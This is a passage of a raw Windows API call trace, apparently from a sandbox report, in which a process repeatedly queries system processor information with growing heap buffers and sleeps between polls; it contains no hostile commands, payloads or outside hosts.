(HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0241.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0241.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0241.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0241.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.585] Sleep (dwMilliseconds=0x110) [0241.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0241.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.591] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0241.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0241.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0241.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bf28 [0241.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bf28, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bf28, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bf28 | out: hHeap=0x2560000) returned 1 [0241.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0241.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0241.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.594] Sleep (dwMilliseconds=0x110) [0241.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0241.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0241.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0241.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0241.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0241.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0241.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0241.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.614] Sleep (dwMilliseconds=0x110) [0241.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0241.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0241.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0241.627] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0241.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0241.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.628] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0241.628] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0241.628] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0241.629] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.629] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.629] Sleep (dwMilliseconds=0x110) [0241.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0241.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.643] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0241.643] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0241.643] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.644] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0241.644] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0241.644] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0241.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0241.645] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.645] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0241.645] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.646] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.646] Sleep (dwMilliseconds=0x110) [0241.656] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0241.656] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0241.657] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0241.657] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.657] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0241.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0241.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.658] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0241.658] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0241.658] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0241.659] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.659] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.659] Sleep (dwMilliseconds=0x110) [0241.672] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0241.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.673] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0241.673] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0241.673] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0241.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0241.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.674] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0241.674] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0241.674] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0241.675] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.675] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.675] Sleep (dwMilliseconds=0x110) [0241.685] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0241.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.686] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0241.686] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0241.686] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.687] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0241.687] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0241.687] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.688] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0241.688] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0241.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0241.689] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.689] Sleep (dwMilliseconds=0x110) [0241.709] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0241.709] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0241.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0241.710] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.710] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0241.710] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0241.710] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.711] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0241.711] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0241.711] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.712] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0241.712] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.712] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.712] Sleep (dwMilliseconds=0x110) [0241.723] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0241.723] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0241.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0241.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.724] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0241.724] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0241.724] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0241.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0241.725] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0241.725] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.725] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.725] Sleep (dwMilliseconds=0x110) [0241.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0241.731] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.732] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0241.732] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0241.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.735] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0241.735] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0241.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.736] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0241.736] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0241.736] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0241.737] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.737] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.737] Sleep (dwMilliseconds=0x110) [0241.751] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0241.751] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.752] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0241.752] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0241.752] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0241.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0241.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.753] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0241.753] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0241.753] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0241.754] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.754] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.754] Sleep (dwMilliseconds=0x110) [0241.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0241.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0241.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0241.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.768] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0241.768] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0241.768] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0241.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0241.769] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.769] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0241.769] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.770] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.770] Sleep (dwMilliseconds=0x110) [0241.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0241.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0241.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0241.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0241.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0241.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.785] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0241.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0241.785] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0241.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0241.786] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0241.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0241.786] Sleep (dwMilliseconds=0x110) [0241.794] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0241.794] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0241.795] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0241.795] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0241.795] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 